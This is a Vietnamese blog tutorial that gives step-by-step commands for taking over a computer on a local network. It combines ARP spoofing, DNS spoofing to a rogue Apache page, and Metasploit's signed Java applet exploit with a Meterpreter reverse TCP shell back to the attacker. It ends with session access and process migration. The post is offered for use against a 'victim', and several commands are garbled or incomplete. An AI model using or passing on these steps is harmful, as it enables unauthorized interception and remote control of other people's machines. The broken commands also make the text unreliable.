Phương pháp :
Mình phối hợp những phương pháp sau cho việc tấn công :
Man-in-the-middle(ARP Spoofing + DNS Spoofing) -- dùng để đưa victim vào bẫy
Metasploit Framework :
_ java_signed_apple exploit
_ payload : reverse tcp (dùng để khi cái exploit nó chạy nó sẽ connect lại mình )
Và với sự trợ giúp của server Apache.
Cách làm :
Router IP: 192.168.1.1
Victim IP: 192.168.1.117
Attacker IP : 192.168.1.140
Lưu ý là nên mở những terminal khác nhau.
Sau khi bạn đã cài Backtrack, login với ID:pass là root:toor.
Mở terminal lên và gõ vào :
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Mục đích là forward ip để khộng DOS mạng LAN do sự cố.
kế đến gõ :
Code:
ìfconfig
Sau khi đã tìm dc IP của mình ta bắt đầu Man-in-the-middle attack bằng cách gõ:
Code:
arpspoof [-i interface] [-t target] host
Code:
arpspoof [-i interface] [-t host] target
Kế đến, bạn khởi động Server Apache bằng cách: Ấn Application(menu) -> Backtrack -> Services -> HTTPD -> start apache
Kế đến ta theo đường dẫn :
Code:
/var/www/
ta mún edit kiểu gì cũng dc, miễn sao có dòng này:
Code:
iframe src=http://: /index/> iframe
Tiếp theo ta tạo file host để redirect victim vào máy ta (có thể add nhìu domain dc):
Code:
pico dns.txt
192.168.1.140 *.com
Sau khi tạo được file host ta dùng lệnh :
Code:
dnsspoof -i-f
Bây giờ ta để mặc nó và mở shell khác, gõ:
msfconsole
Đợi nó load xong ( tầm 30 giây hoặc lâu hơn), ta gõ:
Code:
use exploit/multi/browser/java_signed_applet set URIPATH index set PAYLOAD windows/meterpreter/reverse_tcp set LHOST
set LPORT 4444 exploit
Khi victim kết nối ta sẽ thấy thế này :
bên máy victim sẽ có 1 bảng thông báo yêu cầu chạy chương trình Java. đợi victim click đồng ý thì coi như thành công.
Và bây giờ ta đã có 1 session kết nối vs victim, ta gõ :
Code:
sesions -i 1
Sau đó gõ
Code:
ps
Code:
migrate
Và thành công !!!!
![[Hack]Tấn công DoS trong mạng LAN [TuT hình]](https://lh5.googleusercontent.com/-5CsGLUtfcbM/UF5i_GVmTxI/AAAAAAAAAIA/hvLdyzVCFaM/s72-c/Screenshot+%285%29.png)
![[TuT][Hack] Tấn công máy tính bằng Metasploit](https://lh4.googleusercontent.com/-sveeG-F4xj0/UDZhQkpHGjI/AAAAAAAAAEk/R_EjX6mbEbs/s72-c/2.png)
0 nhận xét:
Đăng nhận xét